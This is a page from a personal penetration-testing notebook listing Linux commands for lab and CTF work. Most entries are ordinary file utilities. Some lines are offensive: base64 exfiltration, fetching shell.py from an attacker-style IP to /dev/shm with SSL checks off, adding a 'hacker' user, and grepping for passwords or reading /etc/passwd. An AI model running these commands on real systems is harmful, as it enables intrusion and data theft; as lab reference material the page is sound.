[email protected]
Search…
[email protected]
About Calvin Lai (fkclai)
My Work
Exploit/CVE PoC
ZeroLogon Exploit
Remote Retrieved Chrome saved Encrypted Password
Twitter Control an RCE attack
Hacking Report (HTB)
Hits & Summary
Windows Machine
Linux Machine
Penetration Testing Checklists
Web Application PenTest
Network/System PenTest
Mobile Application PenTest
Red Team (Windows)
01 Reconnaissance
02 Privileges Escalation
03 Lateral Movement
04 AD Attacks
05 Bypass-Evasion
06 Kerberos Attack
99 Basic Command
Exploitation Guide
01 Reconnaissance
02 Port Enumeration
03 Web Enumeration
04 Windows Enum & Exploit
05 File Enumeration
06 Reverse Shell Cheat Sheet
07 SQL Injection
08 BruteForce
09 XSS Bypass Checklist
10 Spring Boot
11 WPA
12 Payload list
Vuln Hub (Writeup)
MrRobot
CYBERRY
MATRIX 1
Node-1
DPwwn-1
DC7
AiWeb-2
AiWeb-1
BrainPan
CTF (Writeup)
Hacker One
CTF Learn
P.W.N. University - CTF 2018
HITCON
Pwnable
Useful Command/Tools
Windows
Linux
Offensive Security Lab & Exam
Lab
Powered By GitBook
Linux
PE Tool
Commands
PEASS-ng/linPEAS at master · carlospolop/PEASS-ng
GitHub
1
#Exfiltration using Base64
2
base64 -w 0 file
3
4
#find a file
5
find -maxdepth 1
6
find ./ -type f
7
find ./ -type d
8
find ./ -name abc*
9
grep -lR password *.txt
10
find ./ -name webmin 2>/dev/null
11
12
#query file grep functions
13
cut –d ":" -f 1 /etc/passwd
14
echo "hello::there::firend" | awk –F "::" '{print $1, $3}'
15
cat access.log | cut –d " " -f 1 | sort | uniq –c |sort –urn
16
17
#Get HexDump without new lines
18
xxd -p boot12.bin | tr -d '\n'
19
20
#Count
21
wc -l <file> #Lines
22
wc -c #Chars
23
24
#Sort
25
sort -nr #Sort by number and then reverse
26
cat file | sort | uniq #Sort and delete duplicates
27
28
29
#Compare File
30
comm fileA.txt fileB.txt
31
32
#Download
33
wget 10.10.14.14:8000/shell.py
34
curl -vvv 'https://10.10.14.14:8000/shell.py' -b "cookie" -k -o /dev/shm/shell.py
35
-k => tag in the end to disable ssl checks done by curl
36
37
#Unzipp
38
tar -xvzf /path/to/yourfile.tgz
39
tar -xvjf /path/to/yourfile.tbz
40
bzip2 -d /path/to/yourfile.bz2
41
tar jxf file.tar.bz2
42
gunzip /path/to/yourfile.gz
43
unzip file.zip
44
7z -x file.7z
45
sudo apt-get install xz-utils; unxz file.xz
46
47
#Add new user
48
useradd -p 'openssl passwd -1 <Password>' hacker
49
50
51
#HTTP servers
52
python -m SimpleHTTPServer 80
53
python3 -m http.server
54
ruby -rwebrick -e "WEBrick::HTTPServer.new(:Port => 80, :DocumentRoot => Dir.pwd).start"
55
php -S $ip:80
56
57
##Curl
58
#json data
59
curl --header "Content-Type: application/json" --request POST --data '{"password":"password", "username":"admin"}' http://host:3000/endpoint
60
#Auth via JWT
61
curl -X GET -H 'Authorization: Bearer <JWT>' http://host:3000/endpoint
62
63
#Send Email
64
sendEmail -t [email protected] -f [email protected] -s 192.168.8.131 -u Subject -a file.pdf #You will be prompted for the content
65
66
#DD copy hex bin file without first X (28) bytes
67
dd if=file.bin bs=28 skip=1 of=blob
68
69
Copied!
Useful Command/Tools - Previous
Windows
Next - Offensive Security Lab & Exam
Lab
Last modified 1mo ago
Copy link